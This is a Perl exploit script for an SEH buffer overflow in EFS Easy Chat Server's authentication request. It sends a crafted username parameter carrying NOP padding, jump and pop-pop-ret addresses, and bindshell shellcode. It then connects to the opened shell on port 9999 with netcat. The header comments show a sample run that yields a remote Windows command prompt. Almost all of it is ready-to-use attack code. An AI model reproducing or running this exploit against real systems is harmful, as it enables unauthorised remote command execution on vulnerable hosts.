#!/usr/bin/perl # # EFS Easy Chat Server Authentication Request Buffer Overflow (SEH) # # Reference: http://www.milw0rm.com/exploits/8142 # # Tested in Windows XP Pro SP2-3 # # Coded by Dr4sH (Bruno F.) # # Contact: dr4sh[at]hotmail[dot]com # # Thankz: His0ka, str0ke, Vinicius N. # #[......................................................] # # bt~# perl easychat_server_bof.pl 192.168.1.64 # # EFS Easy Chat Server Remote BoF Exploit (SEH) # # [*] Sending Diabolic request... # [*] Connecting to bindshell 192.168.1.64:9999 # # Microsoft Windows XP [versão 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\Program Files\Easy Chat Server> # #[......................................................] # # Enjoy! # use IO::Socket; print "\nEFS Easy Chat Server Remote BoF Exploit (SEH)\n\n"; $host = shift || die "Usage: perl $0 \n"; $junk = "\x90" x 208; $jmp = "\xEB\x06\xAE\xFA"; $ppr = "\xB6\xB2\x01\x10"; $shellcode = "\xd9\xe8\xd9\x74\x24\xf4\xbb\xb6\x14\x60\xe5\x5d\x33\xc9\xb1". "\x50\x31\x5d\x19\x03\x5d\x19\x83\xed\xfc\x54\xe1\x9c\x8f\x73". "\x47\xb5\xa9\x7c\xa7\xba\x2a\x09\x34\x61\x8f\x86\x80\x55\x44". "\xe4\x0f\xde\x5b\xfb\x9b\x51\x44\x88\xc3\x4d\x75\x65\xb2\x06". "\x41\xf2\x44\xf7\x9b\xc4\xde\xab\x58\x04\x94\xb4\xa1\x4e\x58". "\xba\xe3\xa5\x97\x87\xb7\x1d\x70\x8d\xd2\xd6\xdf\x49\x1c\x03". "\xb9\x1a\x12\x98\xcd\x42\x37\x1f\x39\x7f\x6b\x94\x34\xec\x57". "\xb6\x27\x2e\xa6\x1d\xc3\x3b\x8a\x91\x87\x7c\x01\x5a\xe7\x60". "\xb4\xd7\x48\x91\x98\x8f\xc6\xef\x2a\xa3\x87\x10\xe4\x5d\x7b". "\x89\x61\x92\x49\x3d\x05\xa7\x9f\xe2\xbd\xb8\x30\x74\xf5\xab". "\x4d\xbe\x59\xcc\x78\x9e\xd0\xd7\xe3\xa0\x0e\x1f\xee\xf7\xba". "\x1d\x11\x27\x52\xf8\xe4\x3d\x0e\xad\x09\x6b\x02\x02\xa5\xc7". "\xf6\xe7\x1a\xab\xab\x18\x4c\x4d\x24\xc1\x62\xf4\xe7\x84\x9c". "\x6d\x6f\x32\x44\xfe\xb7\x6d\x86\x28\x5d\x81\x29\x80\x5d\x71". "\xa1\x8e\x0f\x5f\xdb\x98\xb0\x49\x48\x72\xb0\xa5\x07\x99\x07". "\xc3\x91\x36\x67\x1d\x71\xed\xc3\xf4\x8d\xdd\x7f\x9e\x96\xa7". "\xb9\x27\x0e\xa7\x90\x82\x4f\x87\x7b\x46\xd4\x4e\xec\xf5\x79". "\x06\x09\x93\xd1\x41\xfb\xaf\x5b\x96\x91\x6b\xd5\xbb\x57\xb3". "\x16\x91\x66\x71\xf4\x18\xd4\x59\x95\x68\xa3\x99\x32\xd9\xff". "\xb1\x36\xe0\xb3\x57\x48\x69\xf0\xa8\x60\xc9\xaf\x04\xdc\xbf". "\x1e\xc2\xdf\x6e\xf0\x47\xb1\x6f\x22\x0f\x9c\x49\xc6\x01\x8d". "\x96\x1f\xf7\xcd\x96\x97\xf8\xe2\xe2\x8f\xfa\x80\x31\x4b\xfd". "\x51\xeb\x6b\xd1\x36\xfc\x1e\xd5\x99\xaf\xe1\x03\xda\x80\x14"; $buffer = $junk.$jmp.$ppr.$shellcode; $socket = IO::Socket::INET->new(PeerAddr=> $host, PeerPort=> '80', Proto=> 'tcp', Timeout=>'1') || die "[-] Unable to Connect.!\n"; print "[*] Sending Diabolic request...\n"; print $socket "GET /chat.ghp?username=".$buffer."&password=ydw&room=2&ydw=2 HTTP/1.1\r\n"; print $socket "Host: $host\r\n\r\n\r\n"; close($socket); print "[*] Connecting to bindshell $host:9999\n\n"; system("nc $host 9999");